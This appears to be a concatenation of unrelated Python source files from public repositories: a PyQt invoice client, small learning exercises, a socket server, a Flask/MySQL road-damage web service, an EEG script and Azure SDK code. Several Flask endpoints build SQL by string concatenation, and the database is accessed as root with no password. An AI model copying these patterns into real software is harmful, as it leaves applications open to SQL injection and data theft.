    # Encode and POST the payload asynchronously.
    postDic=json.dumps(postDic)
    postDic=base64.b64encode(postDic.encode())
    data = QtCore.QByteArray()
    data.append("action=postjournal&")
    data.append("invoice=invoice&")
    data.append("journal={}".format(postDic.decode("utf-8")))
    url = "http://{}:5000/journal".format(self.ip)
    req = QtNetwork.QNetworkRequest(QtCore.QUrl(url))
    req.setHeader(QtNetwork.QNetworkRequest.ContentTypeHeader,
                  "application/x-www-form-urlencoded")
    # Keep a reference on self so the manager survives until the reply.
    self.nam = QtNetwork.QNetworkAccessManager()
    self.nam.finished.connect(self.handleResponse)
    self.nam.post(req, data)
def handleResponse(self, reply):
    """Report the outcome of the asynchronous journal POST.

    On success shows a confirmation dialog and bumps the invoice number;
    on a network error shows a critical message box with the error text.
    """
    er = reply.error()
    if er == QtNetwork.QNetworkReply.NoError:
        bytes_string = reply.readAll()
        json_ar = json.loads(str(bytes_string, 'utf-8'))
        if json_ar['19'] == 'Success':
            journaltype = json_ar['30']
            ref = json_ar['25']
            date = json_ar['35']
            self.MessageBox.setWindowTitle('Post Journal')
            self.MessageBox.setText("")
            # Fixed typo in the user-facing text: "succesfully".
            self.MessageBox.setInformativeText(
                "{j} Journal with Ref: {r} was successfully posted\non {d}. "
                "\n\nClick Ok to exit.".format(j=journaltype, r=ref, d=date))
            self.MessageBox.setIcon(self.MessageBox.Information)
            self.MessageBox.setStandardButtons(self.MessageBox.Ok)
            self.MessageBox.show()
            # Pre-increment the invoice number for the next entry.
            self.invoice_no.setText(str(int(self.invoice_no.text()) + 1))
            result = self.MessageBox.exec_()
            if result == self.MessageBox.Ok:
                pass
    else:
        # Fixed typo in the dialog title: "Databese".
        QMessageBox.critical(self, 'Database Connection ', "\n {} \n".format(reply.errorString()))
if __name__ == '__main__':
    # Manual entry point: launch the invoice window standalone with an
    # empty edit-data dict (i.e. "create new invoice" mode).
    app = QApplication(sys.argv)
    ex = Invoice({})
    ex.show()
    sys.exit(app.exec_())
"[email protected]"
] | |
4f2d7e9a93ccb1c73bfa12146ad9add11e573b27 | d07a26e443538c5fc6b0711aff6e233daef79611 | /LearnPythonGuessGame.py | e3a41526a4b12716d27871e2464f08f1855a7ba6 | [] | no_license | Zahidsqldba07/Python-learn | bd602d490ee53f8e5331e70f92919ca315944ff9 | ffc1608695ed6c7c3d2b6789913e34235dcf468e | refs/heads/master | 2023-03-16T02:18:19.155281 | 2020-09-19T09:12:48 | 2020-09-19T09:12:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 538 | py | secret_word = "respect"
guess = ''
guess_count = 0
guess_limit = 7
out_of_guesses = False
while guess != secret_word and not (out_of_guesses):
if guess_count < guess_limit:
guess = input("What's the secret word?: ")
guess_count += 1
if guess != secret_word:
print("Hint: " + secret_word[int(guess_count)-1])
else:
out_of_guesses = True
if out_of_guesses:
print("All out of guesses, better luck next time!")
exit()
else:
print("Nice work!")
exit() | [
"[email protected]"
] | |
3b475b2198f533613949bc998bef4a4c42ea826f | 5eb13a4e16bd195e9ef823021bc296a747ff98bb | /pbsetq4.py | 3ae1819bfbf979e447b978bf7e4af69530947dcc | [] | no_license | Santosh2108/Python | 59fff6d744ce4a1992489c43d7bacbe45a869a2a | b486fc18417d5463852a4f06eeb922aa2f648f6b | refs/heads/master | 2020-03-22T11:22:29.245458 | 2018-07-12T10:37:41 | 2018-07-12T10:37:41 | 139,967,012 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 772 | py | #A) finding area of the sphere
# A) Sphere computation.  NOTE: (4/3)*pi*r**3 is the VOLUME formula,
#    although the prompt/message call it "area" -- kept as-is to preserve
#    the printed output.
# Python 3 fix: raw_input() no longer exists; use input().
r = int(input('Enter the radius of the sphere: '))
area = (4 / 3.0) * 3.14 * (r ** 3)
print('the area of the sphere is', area)

# B) Wholesale cost for 60 books: 40% discount off the cover price,
#    $3 shipping for the first copy and $0.75 for each additional copy.
coverprice = 24.95
discount = 40 / 100.0
shippingcost = 3
additional = 0.75
count = 60
discountprice = coverprice * discount
totalprice = (coverprice - discountprice) * count
total = totalprice + shippingcost + (count - 1) * additional
print('price for 60 books', total)

# C) Finish time: start at 6:52, run 2 easy miles (8:15 pace) and
#    3 fast miles (7:12 pace).  All arithmetic is in seconds.
timeleft = 6 * 3600 + 52 * 60
easy = 2 * (8 * 60 + 15)
fast = 3 * (7 * 60 + 12)
totaltime = easy + fast + timeleft
# Python 3 fix: use floor division so hours/minutes stay integers
# (plain / would yield floats like 7.67).
hours = totaltime // 3600
remainingseconds = totaltime % 3600
minutes = remainingseconds // 60
seconds = remainingseconds % 60
print('Hours:', hours)
print('minutes:', minutes)
print('seconds:', seconds)
| [
"[email protected]"
] | |
4c38981263972d95636d6e02fdba40dbd8f2c5a8 | 0f4cd79db1379dc151e74400b6fc6a79d5b52d08 | /work06/code/server.py | 3eda8298462d5eed64997dd7e199f250b574a1ff | [] | no_license | Detect-er/Coursework | 3cdffe84a61029e31420a4d89341208937520d02 | 91061dc0b2bed021d092e3da933e716c026ba838 | refs/heads/master | 2021-03-22T17:37:39.847713 | 2020-06-13T03:03:56 | 2020-06-13T03:03:56 | 247,388,020 | 3 | 2 | null | 2020-03-22T13:32:24 | 2020-03-15T02:29:43 | C | UTF-8 | Python | false | false | 1,211 | py | from socket import *
from time import ctime
# Server configuration: local TCP endpoint and the scull char-device file
# that exposes the latest sensor sample (two whitespace-separated values).
HOST = '127.0.0.1'
PORT = 4567
BUFSIZ = 1024
ADDR = (HOST,PORT)
filename = "/mnt/ext4scull"
# 1. Create the server-side TCP socket object.
tcpSerSock = socket(AF_INET,SOCK_STREAM)
# 2. Bind it to the configured IP and port.
tcpSerSock.bind(ADDR)
# 3. Listen for incoming client connections (backlog of 5).
tcpSerSock.listen(5)
while True:
    print('waiting for connection...')
    # 4. Accept a client connection; returns the per-client socket object
    #    and the client's address.
    tcpCliSock, addr = tcpSerSock.accept()
    print('...connnecting from:', addr)
    while True:
        # 5. Receive one request; empty data means the peer closed.
        data = tcpCliSock.recv(BUFSIZ).decode()
        if not data:
            break
        print("From client: %s"%data)
        # 6. Read the scull device contents: field 0 is interpreted as
        #    temperature, field 1 as humidity (see the reply below).
        with open(filename) as f:
            content = f.read()
        f.close()
        # 7. Reply to the client with a timestamped reading.
        tcpCliSock.send(('the time is: [%s]\ntemperature is: %s\nhumidity is: %s' % (
            ctime(), content.split()[0], content.split()[1])).encode())
    # 8. Close the per-client socket and go back to accepting.  The
    #    listening-socket close below is unreachable (infinite loop),
    #    left as in the original.
    tcpCliSock.close()
tcpSerSock.close()
| [
"[email protected]"
] | |
cb5a4b34fb49207a33bf8d1192cb7f3761407b26 | 237598dd6cbd3b85f79221195491893814de8574 | /webservicenew.py | 6e60576ab4f7d1321564d3d4541d55ebdd81e368 | [] | no_license | harsha97sahajan/Road-Damage-Detection | 88ede0cb90f93e9e6ab9df5b72432542c0af0240 | 5c85bb740151e872f027af28ab4a8e53fc2b5a8c | refs/heads/main | 2023-08-30T07:03:41.069394 | 2021-11-12T05:53:38 | 2021-11-12T05:53:38 | 427,242,357 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,188 | py | import os
from flask import *
import pymysql
from werkzeug.utils import secure_filename
from src.classify import predictfn
# Shared MySQL connection/cursor and the Flask application object.
# NOTE(review): a single module-level connection/cursor is shared across
# all requests with no locking, and the root account has no password --
# confirm this is acceptable for the intended deployment.
con = pymysql.connect(host='localhost', port=3306, user='root', passwd='', db='roadsens')
cmd = con.cursor()
app = Flask(__name__)
@app.route('/userreg', methods=['get', 'post'])
def userreg():
    """Register a new user.

    Rejects the request when the username is already taken, otherwise
    creates the login row plus the linked user_reg profile row.
    Returns JSON {'task': 'success'} or {'task': 'invalid'}.
    """
    fname = request.form['fname']
    mname = request.form['mname']
    lname = request.form['lname']
    ph = request.form['ph']
    email = request.form['email']
    username = request.form['un']
    pwd = request.form['pwd']
    # Parameterized queries: the original concatenated form fields into
    # the SQL text, which is vulnerable to SQL injection.
    cmd.execute("select * from login where username=%s and type='user'",
                (username,))
    s = cmd.fetchone()
    if s is not None:
        # Username already registered.
        return jsonify({'task': "invalid"})
    else:
        cmd.execute("INSERT INTO `login` values(null,%s,%s,'user')",
                    (username, pwd))
        login_id = con.insert_id()  # renamed: `id` shadowed the builtin
        cmd.execute("insert into user_reg values(null,%s,%s,%s,%s,%s,%s)",
                    (str(login_id), fname, mname, lname, ph, email))
        con.commit()
        return jsonify({'task': "success"})
@app.route('/login', methods=['POST'])
def login():
    """Authenticate a user; returns the login id and account type.

    Response JSON: {'task': <login id>, 'type': <account type>} on
    success, {'task': 'invalid'} on a failed lookup.
    """
    try:
        username = request.form['un']
        pwd = request.form['pwd']
        try:
            # Parameterized query (was string concatenation -> injectable).
            # NOTE(review): passwords are compared in plain text; they
            # should be hashed -- confirm before hardening.
            cmd.execute(
                "select * from login where username=%s and password=%s",
                (username, pwd))
            s = cmd.fetchone()
            print(s)
            if s is not None:
                login_id = s[0]
                print(login_id)
                return jsonify({'task': str(login_id), 'type': s[3]})
            else:
                return jsonify({'task': "invalid"})
        except Exception as e:
            print(str(e))
            return jsonify({'task': "invalid"})
    except Exception as e:
        # Preserved from the original: missing form fields fall through
        # here and report "success".
        # NOTE(review): that looks unintended -- confirm.
        print(e)
        return jsonify({'task': "success"})
@app.route('/send_spot_complaint', methods=['get', 'post'])
def send_spot_complaint():
    """Store a geo-tagged road complaint with an attached photo.

    Saves the uploaded image under ./static/image and inserts a row with
    status 'pending' and no assigned officer yet.
    """
    latitude = request.form['latitude']
    print(latitude)
    longitude = request.form['longitude']
    complaint = request.form['complaint']
    uid = request.form['uid']
    image = request.files['files']
    file = secure_filename(image.filename)
    image.save(os.path.join("./static/image", file))
    # Parameterized insert (was string concatenation -> injectable).
    cmd.execute(
        "insert into spotcomplaint values(null,%s,%s,%s,%s,'pending',null,%s)",
        (uid, latitude, longitude, complaint, str(file)))
    con.commit()
    return jsonify({'task': "success"})
@app.route('/send_emg_alert', methods=['get', 'post'])
def send_emg_alert():
    """Store a geo-tagged emergency alert for a user."""
    latitude = request.form['latitude']
    longitude = request.form['longitude']
    description = request.form['description']
    uid = request.form['uid']
    # Parameterized insert (was string concatenation -> injectable).
    cmd.execute(
        "insert into emergency_alert values(null,%s,%s,%s,%s)",
        (uid, latitude, longitude, description))
    con.commit()
    return jsonify({'task': "success"})
@app.route('/view_signal', methods=['POST', 'GET'])
def view_signal():
    """Return traffic signals within ~6.2 miles (10 km) of the given point.

    The distance is a haversine-style expression computed in SQL
    (3959 = Earth radius in miles).
    """
    latitude = request.form['latitude']
    longitude = request.form['longitude']
    # NOTE(review): latitude/longitude are concatenated straight into the
    # SQL text -- injectable; should be parameterized.
    cmd.execute("select * ,(3959 * ACOS ( COS ( RADIANS('" + str(
        latitude) + "') ) * COS( RADIANS(`latitude`) ) * COS( RADIANS(`longitude`) - RADIANS('" + str(
        longitude) + "') ) + SIN ( RADIANS('" + str(
        latitude) + "') ) * SIN( RADIANS(`latitude`) ))) AS user_distance from trafficsignal_reg HAVING user_distance < 6.2137")
    # Debug echo of the generated SQL.
    print("select * ,(3959 * ACOS ( COS ( RADIANS('" + str(
        latitude) + "') ) * COS( RADIANS(`latitude`) ) * COS( RADIANS(`longitude`) - RADIANS('" + str(
        longitude) + "') ) + SIN ( RADIANS('" + str(
        latitude) + "') ) * SIN( RADIANS(`latitude`) ))) AS user_distance from trafficsignal_reg HAVING user_distance < 6.2137")
    s = cmd.fetchall();
    print(s)
    # Zip the column names with each row to build JSON-friendly dicts.
    row_headers = [x[0] for x in cmd.description]
    json_data = []
    for result in s:
        json_data.append(dict(zip(row_headers, result)))
    print(json_data)
    return jsonify(json_data)
@app.route('/view_important_place', methods=['POST', 'GET'])
def view_important_place():
    """Return registered important places within ~6.2 miles (10 km)."""
    latitude = request.form['latitude']
    longitude = request.form['longitude']
    # NOTE(review): latitude/longitude are concatenated into the SQL --
    # injectable; should be parameterized.
    cmd.execute("select * ,(3959 * ACOS ( COS ( RADIANS('" + str(latitude) + "') ) * COS( RADIANS(`latitude`) ) * COS( RADIANS(`longitude`) - RADIANS('" + str(
        longitude) + "') ) + SIN ( RADIANS('" + str(latitude) + "') ) * SIN( RADIANS(`latitude`) ))) AS user_distance from imp_place_reg HAVING user_distance < 6.2137")
    s = cmd.fetchall();
    print(s)
    # Zip the column names with each row to build JSON-friendly dicts.
    row_headers = [x[0] for x in cmd.description]
    json_data = []
    for result in s:
        json_data.append(dict(zip(row_headers, result)))
    print(json_data)
    return jsonify(json_data)
@app.route('/view_complaint', methods=['POST', 'GET'])
def view_complaint():
    """Return all pending spot complaints joined with the reporter's details."""
    cmd.execute(" SELECT `spotcomplaint`.* ,`user_reg`.`fname`,`mname`,`lname`,`phone` FROM `user_reg` JOIN `spotcomplaint` ON `spotcomplaint`.`uid`=`user_reg`.lid where status='pending'")
    rows = cmd.fetchall()
    print(rows)
    # Pair each row with the cursor's column names.
    columns = [col[0] for col in cmd.description]
    payload = [dict(zip(columns, row)) for row in rows]
    print(payload)
    return jsonify(payload)
@app.route('/view_status', methods=['POST', 'GET'])
def view_status():
    """Return the status of a user's complaints plus the handling officer."""
    uid = request.form['uid']
    # Parameterized query: uid was concatenated into the SQL text,
    # which is vulnerable to SQL injection.
    cmd.execute(
        "SELECT`spotcomplaint`.complaint,status,`traffic_police_reg`.`fname`,"
        "`mname`,`lname`,`phone` FROM `traffic_police_reg` JOIN `spotcomplaint` "
        "ON `spotcomplaint`.`policid`=`traffic_police_reg`.lid WHERE uid=%s",
        (uid,))
    s = cmd.fetchall()
    print(s)
    # Pair each row with the cursor's column names for JSON output.
    row_headers = [x[0] for x in cmd.description]
    json_data = []
    for result in s:
        json_data.append(dict(zip(row_headers, result)))
    print(json_data)
    return jsonify(json_data)
@app.route('/view_emergency_alert', methods=['POST', 'GET'])
def view_emergency_alert():
    """Return every emergency alert joined with the sender's details."""
    cmd.execute("SELECT `emergency_alert`.`descripion` ,`user_reg`.`fname`,`mname`,`lname`,`phone` FROM `user_reg` JOIN `emergency_alert` ON `emergency_alert`.`uid`=`user_reg`.lid ")
    rows = cmd.fetchall()
    print(rows)
    # Pair each row with the cursor's column names.
    columns = [col[0] for col in cmd.description]
    payload = [dict(zip(columns, row)) for row in rows]
    print(payload)
    return jsonify(payload)
@app.route('/update_status', methods=['POST', 'GET'])
def update_status():
    """Update a complaint's status and record the handling officer."""
    sc_id = request.form['cid']
    reply = request.form['reply']
    pid = request.form['pid']
    # Parameterized update (was string concatenation -> injectable).
    cmd.execute(
        "UPDATE `spotcomplaint` SET `spotcomplaint`.`status`=%s,policid=%s "
        "WHERE `spotcomplaint`.`sc_id`=%s",
        (reply, pid, str(sc_id)))
    con.commit()
    return jsonify({'task': "success"})
@app.route('/emergency', methods=['get', 'post'])
def emergency():
    """Record a road-disruption sample (position + speed, timestamped now())."""
    latitude = request.form['latitude']
    longitude = request.form['longitude']
    speed = request.form['speed']
    # Parameterized insert (was string concatenation -> injectable).
    cmd.execute(
        "insert into distruption values(null,%s,%s,%s,now())",
        (latitude, longitude, speed))
    con.commit()
    return jsonify({'task': "success"})
@app.route('/service', methods=['POST'])
def service():
    """Decide whether the road near a point needs service.

    s  = disruption events (1000 < strength < 4440) within ~2 miles over
         the last 10 days; s1 = the same for the preceding 10-day window.
    Answers {"task": "yes"} when recent activity is high and not clearly
    declining, otherwise {"task": "no"}.
    """
    latitude=request.form['lati']
    longitude=request.form['longi']
    # NOTE(review): lati/longi are concatenated into the SQL text --
    # injectable; should be parameterized.
    cmd.execute("select * ,(3959 * ACOS ( COS ( RADIANS("+latitude+") ) * COS( RADIANS(`latitude`) ) * COS( RADIANS(`longitude`) - RADIANS("+longitude+") ) + SIN ( RADIANS("+latitude+") ) * SIN( RADIANS(`latitude`) ))) AS user_distance from distruption where strength<4440 and strength>1000 and date>=DATE_ADD(curdate(),interval -10 day) HAVING user_distance < 2 ")
    s=cmd.fetchall()
    cmd.execute(
        "select * ,(3959 * ACOS ( COS ( RADIANS(" + latitude + ") ) * COS( RADIANS(`latitude`) ) * COS( RADIANS(`longitude`) - RADIANS(" + longitude + ") ) + SIN ( RADIANS(" + latitude + ") ) * SIN( RADIANS(`latitude`) ))) AS user_distance from distruption where strength<4440 and strength>1000 and date<DATE_ADD(curdate(),interval -10 day)and date>DATE_ADD(curdate(),interval -20 day) HAVING user_distance < 2 ")
    s1 = cmd.fetchall()
    if len(s1)<len(s):
        # Activity increased relative to the previous window: report
        # "yes" only when there are more than 5 recent events.
        if len(s)>5:
            return jsonify({"task":"yes"})
        else:
            return jsonify({"task": "no"})
    else:
        if len(s1)>5:
            # Activity did not grow; still "yes" when the recent window
            # retains more than half of the previous window's count.
            p=(len(s)/len(s1))*100
            if p>50.0:
                return jsonify({"task": "yes"})
            else:
                return jsonify({"task": "no"})
        else:
            return jsonify({"task": "no"})
@app.route("/capture", methods=['post'])  # bug fix: was @pp.route (NameError)
def capture():
    """Receive a road photo, classify it, and log a disruption sample.

    Saves the upload under camimg/image, runs the image classifier, and
    inserts a distruption row with a fixed strength of 4000 when the
    classifier answers 'normal'.
    """
    img = request.files["files"]
    lt = request.form['latitude']
    lon = request.form['longitude']
    file = secure_filename(img.filename)
    img.save(os.path.join("camimg/image", file))
    # renamed `re` -> `result`: `re` shadows the stdlib module name.
    result = predictfn(os.path.join("camimg/image", file))
    # NOTE(review): logging a disruption when the classifier says
    # 'normal' looks inverted -- confirm the intended label.
    if result == 'normal':
        # Parameterized insert (was string concatenation -> injectable).
        cmd.execute(
            "insert into distruption values(null,%s,%s,'4000',now())",
            (lt, lon))
        con.commit()
    # Always respond; the original returned None (an HTTP 500) when the
    # classifier result was not 'normal'.
    return jsonify({'task': "success"})
if __name__ == "__main__":
    # Listen on all interfaces so mobile clients on the LAN can reach us.
    app.run(host='0.0.0.0', port=5000)
| [
"[email protected]"
] | |
667907153fb3690183536d53d10538fd0e5ee2f8 | bfc25f1ad7bfe061b57cfab82aba9d0af1453491 | /data/external/repositories_2to3/197978/Grasp-and-lift-EEG-challenge-master/genInfos.py | 3fe287f7ae615d7d863ba13934411a5cad7ad2b9 | [
"MIT"
] | permissive | Keesiu/meta-kaggle | 77d134620ebce530d183467202cf45639d9c6ff2 | 87de739aba2399fd31072ee81b391f9b7a63f540 | refs/heads/master | 2020-03-28T00:23:10.584151 | 2018-12-20T19:09:50 | 2018-12-20T19:09:50 | 147,406,338 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,710 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Aug 13 21:35:28 2015.
@author: fornax
"""
import numpy as np
import pandas as pd
from glob import glob
from mne import concatenate_raws
from preprocessing.aux import creat_mne_raw_object
# #### define lists #####
subjects = list(range(1, 13))
lbls_tot = []
subjects_val_tot = []
series_val_tot = []
ids_tot = []
subjects_test_tot = []
series_test_tot = []
# #### generate predictions #####
for subject in subjects:
print('Loading data for subject %d...' % subject)
# ############### READ DATA ###############################################
fnames = glob('data/train/subj%d_series*_data.csv' % (subject))
fnames.sort()
fnames_val = fnames[-2:]
fnames_test = glob('data/test/subj%d_series*_data.csv' % (subject))
fnames_test.sort()
raw_val = concatenate_raws([creat_mne_raw_object(fname, read_events=True)
for fname in fnames_val])
raw_test = concatenate_raws([creat_mne_raw_object(fname, read_events=False)
for fname in fnames_test])
# extract labels for series 7&8
labels = raw_val._data[32:]
lbls_tot.append(labels.transpose())
# aggregate infos for validation (series 7&8)
raw_series7 = creat_mne_raw_object(fnames_val[0])
raw_series8 = creat_mne_raw_object(fnames_val[1])
series = np.array([7] * raw_series7.n_times +
[8] * raw_series8.n_times)
series_val_tot.append(series)
subjs = np.array([subject]*labels.shape[1])
subjects_val_tot.append(subjs)
# aggregate infos for test (series 9&10)
ids = np.concatenate([np.array(pd.read_csv(fname)['id'])
for fname in fnames_test])
ids_tot.append(ids)
raw_series9 = creat_mne_raw_object(fnames_test[1], read_events=False)
raw_series10 = creat_mne_raw_object(fnames_test[0], read_events=False)
series = np.array([10] * raw_series10.n_times +
[9] * raw_series9.n_times)
series_test_tot.append(series)
subjs = np.array([subject]*raw_test.n_times)
subjects_test_tot.append(subjs)
# save validation infos
subjects_val_tot = np.concatenate(subjects_val_tot)
series_val_tot = np.concatenate(series_val_tot)
lbls_tot = np.concatenate(lbls_tot)
toSave = np.c_[lbls_tot, subjects_val_tot, series_val_tot]
np.save('infos_val.npy', toSave)
# save test infos
subjects_test_tot = np.concatenate(subjects_test_tot)
series_test_tot = np.concatenate(series_test_tot)
ids_tot = np.concatenate(ids_tot)
toSave = np.c_[ids_tot, subjects_test_tot, series_test_tot]
np.save('infos_test.npy', toSave)
| [
"[email protected]"
] | |
c10252bfec21903bc8ae0d91f331ff0f08794f14 | 95ee2471fd393c9cb9807a867dbf6bc000c83484 | /Python/extraset.py | f4b2b970cfc213c7388b6e33f581b6bff00581b5 | [] | no_license | Hugens25/School-Projects | 6c7be0e3f96c651162595bb467de2334d2f91152 | b8d40c4cfcf811e7a62f6d5e1c2bf5bd8d5b1480 | refs/heads/master | 2020-07-02T15:01:39.898406 | 2019-08-10T02:34:21 | 2019-08-10T02:34:21 | 201,565,483 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,238 | py | #import itertools
def compare_vals(a, b):
    """Return the third SET-card attribute value given two distinct ones.

    Attribute values are 0, 1 or 2; given two *different* values, the
    remaining one completes the set.  Raises ValueError (matching the
    original list.remove-based version) when a == b or either value is
    outside {0, 1, 2}.
    """
    remaining = {0, 1, 2} - {a, b}
    if len(remaining) != 1:
        raise ValueError("expected two distinct values from {0, 1, 2}")
    return remaining.pop()
# Count SET triples: for every test case, read the cards, then for each
# pair of cards derive the unique third card that would complete a set
# and check whether it is present.  Each set is discovered once per
# ordered choice of two of its three cards, hence the final /3.
num_cases = int(input())
for i in range(num_cases):
    info = list(map(int, input().split()))
    attributes = info[0]
    total_cards = info[1]
    all_cards = []
    count = 0
    for j in range(total_cards):
        all_cards.append(list(map(int, input().split())))
    needed_card = []
    for i in range(len(all_cards)):
        for j in range(i+1,len(all_cards)):
            for k in range(attributes):
                # NOTE(review): possible_values is never used here
                # (compare_vals builds its own) -- dead assignment.
                possible_values = [0,1,2]
                # Same value on both cards -> third card repeats it;
                # different values -> third card takes the missing one.
                if all_cards[i][k] == all_cards[j][k]:
                    needed_card.append(all_cards[i][k])
                if all_cards[i][k] != all_cards[j][k]:
                    needed_card.append(compare_vals(all_cards[i][k],all_cards[j][k]))
            if needed_card in all_cards:
                count += 1
                needed_card.clear()
            else:
                needed_card.clear()
    print(int(count/3))
| [
"[email protected]"
] | |
e3081826c16e08d1104471dac1a6abd7e415551c | b8a195eff34bb7a03012b27356536f9713f18ff6 | /I0320063_exercise9.5.py | 957b970e95aadabddc1e142216cb19f8725219a3 | [] | no_license | AfinFirnas/Muhammad-Firnas-Balisca-Putra_I0320063_Abyan_Tugas9 | f66711831a01f0b30af1779093051fcb43fc0b25 | 89083ee2c37f73fa9a218e12bb0a92db353bf8cc | refs/heads/main | 2023-04-17T14:48:59.361287 | 2021-04-30T11:51:38 | 2021-04-30T11:51:38 | 363,116,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | A = [
[
[10,20,30],
[40,50,60]
],
[
[11,21,31],
[41,51,61]
]
]
# mengakses elemen 10
print(A[0][0][0])
# mengakses elemen 50
print(A[0][1][1]) | [
"[email protected]"
] | |
24da100dd2dcfb1fbf2dc0f990d2db5cecb40f9e | a838d4bed14d5df5314000b41f8318c4ebe0974e | /sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2021_01_01/operations/_blob_services_operations.py | 0d43959e0413d45f681583c3efd5aacfe3752027 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | scbedd/azure-sdk-for-python | ee7cbd6a8725ddd4a6edfde5f40a2a589808daea | cc8bdfceb23e5ae9f78323edc2a4e66e348bb17a | refs/heads/master | 2023-09-01T08:38:56.188954 | 2021-06-17T22:52:28 | 2021-06-17T22:52:28 | 159,568,218 | 2 | 0 | MIT | 2019-08-11T21:16:01 | 2018-11-28T21:34:49 | Python | UTF-8 | Python | false | false | 13,580 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class BlobServicesOperations(object):
"""BlobServicesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.storage.v2021_01_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
    def __init__(self, client, config, serializer, deserializer):
        # Thin wiring of the shared pipeline client, (de)serializers and
        # configuration onto this operation group; no I/O happens here.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    def list(
        self,
        resource_group_name, # type: str
        account_name, # type: str
        **kwargs # type: Any
    ):
        # type: (...) -> Iterable["_models.BlobServiceItems"]
        """List blob services of storage account. It returns a collection of one object named default.

        :param resource_group_name: The name of the resource group within the user's subscription. The
         name is case insensitive.
        :type resource_group_name: str
        :param account_name: The name of the storage account within the specified resource group.
         Storage account names must be between 3 and 24 characters in length and use numbers and
         lower-case letters only.
        :type account_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either BlobServiceItems or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.storage.v2021_01_01.models.BlobServiceItems]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.BlobServiceItems"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2021-01-01"
        accept = "application/json"

        # Builds the GET request for the first page (templated URL) or a
        # follow-up page (opaque next_link returned by the service).
        def prepare_request(next_link=None):
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

            if not next_link:
                # Construct URL
                url = self.list.metadata['url']  # type: ignore
                path_format_arguments = {
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
                    'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request

        # Deserializes one page into (next_link, items); here next_link is
        # always None because the service returns a single page.
        def extract_data(pipeline_response):
            deserialized = self._deserialize('BlobServiceItems', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return None, iter(list_of_elem)

        # Executes one page request and maps HTTP errors to exceptions.
        def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response

        return ItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/blobServices'}  # type: ignore
def set_service_properties(
self,
resource_group_name, # type: str
account_name, # type: str
parameters, # type: "_models.BlobServiceProperties"
**kwargs # type: Any
):
# type: (...) -> "_models.BlobServiceProperties"
"""Sets the properties of a storage account’s Blob service, including properties for Storage
Analytics and CORS (Cross-Origin Resource Sharing) rules.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param parameters: The properties of a storage account’s Blob service, including properties for
Storage Analytics and CORS (Cross-Origin Resource Sharing) rules.
:type parameters: ~azure.mgmt.storage.v2021_01_01.models.BlobServiceProperties
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BlobServiceProperties, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2021_01_01.models.BlobServiceProperties
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BlobServiceProperties"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01"
